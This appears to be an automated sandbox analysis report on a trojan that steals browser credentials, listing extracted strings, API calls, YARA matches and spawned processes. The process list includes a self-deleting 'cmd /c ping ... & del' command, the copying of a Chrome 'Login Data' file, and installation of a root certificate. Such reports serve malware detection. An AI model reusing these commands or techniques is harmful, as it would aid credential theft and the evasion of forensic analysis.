Source: 26FF190E7AE0F7C7.exe	String found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonly
Source: 26FF190E7AE0F7C7.exe, 00000007.00000003.379681472.0000000003EB4000.00000004.00000001.sdmp	String found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonlymdVA
Source: 26FF190E7AE0F7C7.exe, 00000007.00000003.379486057.0000000003ED9000.00000004.00000001.sdmp	String found in binary or memory: https://www.googleapis.com/auth/clouddevices
Source: 26FF190E7AE0F7C7.exe, 00000007.00000003.378363979.0000000003E97000.00000004.00000001.sdmp	String found in binary or memory: https://www.googleapis.com/auth/clouddevicesY
Source: 26FF190E7AE0F7C7.exe	String found in binary or memory: https://www.googleapis.com/auth/h
Source: 26FF190E7AE0F7C7.exe, 00000007.00000003.379486057.0000000003ED9000.00000004.00000001.sdmp	String found in binary or memory: https://www.googleapis.com/auth/hangouts
Source: 26FF190E7AE0F7C7.exe, 00000007.00000003.379486057.0000000003ED9000.00000004.00000001.sdmp	String found in binary or memory: https://www.googleapis.com/auth/hangouts.readonly
Source: 26FF190E7AE0F7C7.exe, 00000007.00000003.379627052.0000000003EC0000.00000004.00000001.sdmp	String found in binary or memory: https://www.googleapis.com/auth/hangoutsR
Source: 26FF190E7AE0F7C7.exe, 00000007.00000003.379486057.0000000003ED9000.00000004.00000001.sdmp	String found in binary or memory: https://www.googleapis.com/auth/meetings
Source: 26FF190E7AE0F7C7.exe, 00000007.00000003.378363979.0000000003E97000.00000004.00000001.sdmp	String found in binary or memory: https://www.googleapis.com/auth/meetings$
Source: 26FF190E7AE0F7C7.exe, 00000007.00000003.379627052.0000000003EC0000.00000004.00000001.sdmp	String found in binary or memory: https://www.googleapis.com/auth/meetings6
Source: 26FF190E7AE0F7C7.exe, 00000007.00000003.379599814.0000000003ED5000.00000004.00000001.sdmp	String found in binary or memory: https://www.googleapis.com/auth/plus.peopK
Source: 26FF190E7AE0F7C7.exe, 00000007.00000003.379599814.0000000003ED5000.00000004.00000001.sdmp	String found in binary or memory: https://www.googleapis.com/auth/plus.peopKK
Source: 26FF190E7AE0F7C7.exe	String found in binary or memory: https://www.googleapis.com/auth/plus.peopleapi.readwri
Source: 26FF190E7AE0F7C7.exe, 00000007.00000003.379486057.0000000003ED9000.00000004.00000001.sdmp	String found in binary or memory: https://www.googleapis.com/auth/plus.peopleapi.readwrite
Source: 26FF190E7AE0F7C7.exe, 00000007.00000003.378363979.0000000003E97000.00000004.00000001.sdmp	String found in binary or memory: https://www.googleapis.com/auth/plus.peopleapi.readwriteVOs
Source: 26FF190E7AE0F7C7.exe	String found in binary or memory: https://www.googleapis.com/auth/sierra
Source: 26FF190E7AE0F7C7.exe, 00000007.00000003.378363979.0000000003E97000.00000004.00000001.sdmp	String found in binary or memory: https://www.googleapis.com/auth/sierra85.0.
Source: 26FF190E7AE0F7C7.exe	String found in binary or memory: https://www.googleapis.com/auth/sierrasandbox
Source: 26FF190E7AE0F7C7.exe, 00000007.00000003.378363979.0000000003E97000.00000004.00000001.sdmp	String found in binary or memory: https://www.googleapis.com/auth/sierrasandbox&
Source: 26FF190E7AE0F7C7.exe, 00000007.00000003.379540838.0000000003E9D000.00000004.00000001.sdmp	String found in binary or memory: https://www.googleapis.com/auth/userinfo.email
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://www.googletagmanager.com/gtag/js?id=UA-26908291-4
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://www.googletagmanager.com/gtm.js?id=GTM-PZ6TRJB
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://www.gstatic.com/external_hosted/autotrack/autotrack.js
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://www.gstatic.com/external_hosted/lottie/lottie.js
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://www.gstatic.com/external_hosted/modernizr/modernizr.js
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://www.gstatic.com/external_hosted/scrollmagic/ScrollMagic.min.js
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://www.gstatic.com/external_hosted/scrollmagic/animation.gsap.min.js
Source: 26FF190E7AE0F7C7.exe, 00000007.00000003.379486057.0000000003ED9000.00000004.00000001.sdmp	String found in binary or memory: https://www.gstatic.com;
Source: 26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: https://www.instagram.com/
Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.426984843.000000000347C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: https://www.instagram.com/accept:
Source: 26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: https://www.instagram.com/accounts/login/ajax/facebook/
Source: 26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: https://www.instagram.com/graphql/query/?query_hash=149bef52a3b2af88c0fec37913fe1cbc&variables=%7B%2
Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.426984843.000000000347C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: https://www.instagram.com/sec-fetch-site:
Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.426984843.000000000347C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: https://www.instagram.comsec-fetch-mode:
Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.426984843.000000000347C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: https://www.messenger.com
Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.426984843.000000000347C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: https://www.messenger.com/
Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.426984843.000000000347C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: https://www.messenger.com/accept:
Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.426984843.000000000347C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: https://www.messenger.com/login/nonce/
Source: 26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: https://www.messenger.com/origin:
Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.426984843.000000000347C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: https://www.messenger.comhttps://www.messenger.com/login/nonce/ookie:

Source: C:\Users\user\AppData\Roaming\1618257864703.exe

Code function: 11_2_0040AE4D OpenClipboard,

Source: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe, 00000000.00000002.368315810.000000000079A000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Registers a new ROOT certificate

Show sources

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe

Code function: 0_2_1001F780 CryptStringToBinaryA,CryptStringToBinaryA,CertCreateCertificateContext,CertOpenStore,CertAddCertificateContextToStore,GetLastError,CertGetCertificateContextProperty,_memset,CertGetCertificateContextProperty,_memset,_memset,_sprintf,_sprintf,CertCloseStore,CertFreeCertificateContext,

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 7.2.26FF190E7AE0F7C7.exe.30f0000.6.unpack, type: UNPACKEDPE	Matched rule: APT34_PICKPOCKET Author: unknown
Source: 6.2.26FF190E7AE0F7C7.exe.32b0000.6.unpack, type: UNPACKEDPE	Matched rule: APT34_PICKPOCKET Author: unknown

PE file has a writeable .text section

Show sources

Source: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 26FF190E7AE0F7C7.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_1001A000 LoadLibraryA,GetProcAddress,GetCurrentProcess,NtQueryInformationProcess,
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_10019DA0 LoadLibraryA,GetProcAddress,GetCurrentThread,NtSetInformationThread,
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_10019F60 LoadLibraryA,GetProcAddress,GetCurrentProcess,NtQueryInformationProcess,
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_10019FB0 LoadLibraryA,GetProcAddress,GetCurrentProcess,NtQueryInformationProcess,
Source: C:\Users\user\AppData\Roaming\1618257864703.exe	Code function: 11_2_0040C516 NtQuerySystemInformation,
Source: C:\Users\user\AppData\Roaming\1618257864703.exe	Code function: 11_2_0040C6FB memset,CreateFileW,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,FreeLibrary,

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe

Code function: 0_2_00403660: DeviceIoControl,

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_00403E2C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_004093D5
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_1000C073
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_1000B893
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_10006100
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_100099F0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_10007200
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_10016A1D
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_10009267
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_10010AAC
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_10008350
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_1000ABB0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_1000B3C0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_1000E3E0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_10008400
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_1001EC30
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_1000BC67
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_1000C493
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_100105F0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_1001EE3B
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_1000FFD1
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Code function: 6_2_1000C073
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Code function: 6_2_1000B893
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Code function: 6_2_10006100
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Code function: 6_2_100099F0
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Code function: 6_2_10007200
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Code function: 6_2_10016A1D
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Code function: 6_2_10009267
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Code function: 6_2_10010AAC
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Code function: 6_2_10008350
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Code function: 6_2_1000ABB0
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Code function: 6_2_1000B3C0
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Code function: 6_2_1000E3E0
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Code function: 6_2_10008400
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Code function: 6_2_1001EC30
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Code function: 6_2_1000BC67
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Code function: 6_2_1000C493
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Code function: 6_2_100105F0
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Code function: 6_2_1001EE3B
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Code function: 6_2_1000FFD1
Source: C:\Users\user\AppData\Roaming\1618257864703.exe	Code function: 11_2_00404BE4
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe	Code function: 21_2_00016A1E
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe	Code function: 21_2_0001963B
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe	Code function: 21_2_0001A0C3
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe	Code function: 21_2_0001B51C
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe	Code function: 21_2_00019B7F
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe	Code function: 21_2_0001A7BB

Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Code function: String function: 10010594 appears 35 times
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: String function: 10010594 appears 35 times

Source: 1618257864703.exe.6.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 1618257864703.exe.6.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe, 00000000.00000002.367125826.0000000000412000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameVBCABLE_ControlPanel.exeJ vs SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe
Source: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe, 00000000.00000002.369261894.0000000002B10000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamenlsbres.dll.muij% vs SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe
Source: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Binary or memory string: OriginalFilenameVBCABLE_ControlPanel.exeJ vs SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe

Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: tsappcmp.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll

Source: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: 00000000.00000002.368875483.0000000002690000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000007.00000002.384812793.00000000025A0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000006.00000002.425171659.00000000026C0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 0.2.SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe.10000000.6.unpack, type: UNPACKEDPE	Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 6.2.26FF190E7AE0F7C7.exe.10000000.11.unpack, type: UNPACKEDPE	Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 7.2.26FF190E7AE0F7C7.exe.25a0000.4.unpack, type: UNPACKEDPE	Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 7.2.26FF190E7AE0F7C7.exe.10000000.11.unpack, type: UNPACKEDPE	Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 6.2.26FF190E7AE0F7C7.exe.26c0000.2.unpack, type: UNPACKEDPE	Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 7.2.26FF190E7AE0F7C7.exe.25a0000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 6.2.26FF190E7AE0F7C7.exe.26c0000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 0.2.SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe.2690000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 0.2.SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe.2690000.4.unpack, type: UNPACKEDPE	Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 7.2.26FF190E7AE0F7C7.exe.30f0000.6.unpack, type: UNPACKEDPE	Matched rule: APT34_PICKPOCKET Description = Detects the PICKPOCKET malware used by APT34, a browser credential-theft tool identified by FireEye in May 2018, Reference = https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html
Source: 6.2.26FF190E7AE0F7C7.exe.32b0000.6.unpack, type: UNPACKEDPE	Matched rule: APT34_PICKPOCKET Description = Detects the PICKPOCKET malware used by APT34, a browser credential-theft tool identified by FireEye in May 2018, Reference = https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html

Source: classification engine

Classification label: mal93.bank.troj.spyw.evad.winEXE@32/37@98/2

Source: C:\Users\user\AppData\Roaming\1618257864703.exe

Code function: 11_2_0040CE93 CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,OpenProcess,OpenProcess,memset,GetModuleHandleW,GetProcAddress,QueryFullProcessImageNameW,QueryFullProcessImageNameW,CloseHandle,Process32NextW,CloseHandle,

Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe

Code function: 21_2_00011058 CoCreateInstance,

Source: C:\Users\user\AppData\Roaming\1618257864703.exe

Code function: 11_2_0040D9FC FindResourceW,SizeofResource,LoadResource,LockResource,

Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe

File created: C:\Users\user\AppData\Local\Login Data1618257834647

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6744:120:WilError_01
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\exist_sign_task_Hello002
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\exist_sign_task_Hello001
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\exist_sign__install_r3
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6940:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5900:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7052:120:WilError_01

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe

File created: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe

Jump to behavior

Source: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\AppData\Roaming\1618257864703.exe

System information queried: HandleInformation

Source: C:\Windows\SysWOW64\taskkill.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "chrome.exe")

Source: C:\Windows\SysWOW64\msiexec.exe

File read: C:\Windows\win.ini

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.426984843.000000000347C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.426984843.000000000347C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.426984843.000000000347C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.426984843.000000000347C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp	Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.426984843.000000000347C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp	Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.426984843.000000000347C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp	Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.426984843.000000000347C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp	Binary or memory string: SELECT 'DELETE FROM vacuum_db.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'

Source: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Virustotal: Detection: 75%
Source: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Metadefender: Detection: 25%
Source: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	ReversingLabs: Detection: 64%

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe

File read: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe'
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Process created: C:\Windows\SysWOW64\msiexec.exe msiexec.exe /i 'C:\Users\user\AppData\Local\Temp\gdiview.msi'
Source: unknown	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding CF809D2679ADCE8E1511069275F0596C C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Process created: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe 0011 installp3
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Process created: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe 200 installp3
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe'
